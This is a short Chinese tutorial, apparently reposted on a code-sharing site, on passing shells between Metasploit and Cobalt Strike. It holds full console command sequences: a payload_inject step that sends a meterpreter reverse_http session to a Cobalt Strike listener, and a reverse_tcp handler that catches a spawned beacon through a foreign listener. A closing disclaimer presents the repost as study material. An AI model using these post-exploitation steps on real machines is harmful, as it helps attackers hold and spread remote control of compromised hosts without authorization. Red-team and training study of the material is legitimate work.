metasploit與Cobaltstrike互相派生shell


msf 派生 shell 給 Cobalt strike(前提有一個meterpreter)

msf exploit(handler) >  use exploit/windows/local/payload_inject
  msf exploit(payload_inject) >  set PAYLOAD windows/meterpreter/reverse_http
  msf exploit(payload_inject) > set DisablePayloadHandler true
  msf exploit(payload_inject) > set LHOST 192.168.229.143
  msf exploit(payload_inject) > set LPORT 1212
  msf exploit(payload_inject) > set SESSION 1
  msf exploit(payload_inject) > exploit

Cobalt strike 派生 shell 給 MSF(前提有個beaconshell)

msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.100
lhost => 192.168.1.100
msf exploit(handler) > set lport 5555
lport => 5555
msf exploit(handler) > exploit

之后使用Cobalt Strike創建一個

windows/foreign/reverse_tcp Listener

其中ip為msf的ip地址,端口為msf所監聽的端口。
然后選中計算機,右鍵->Spawn,選擇剛剛創建的監聽器:
msf中即可看到成功獲取了meterpreter會話

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM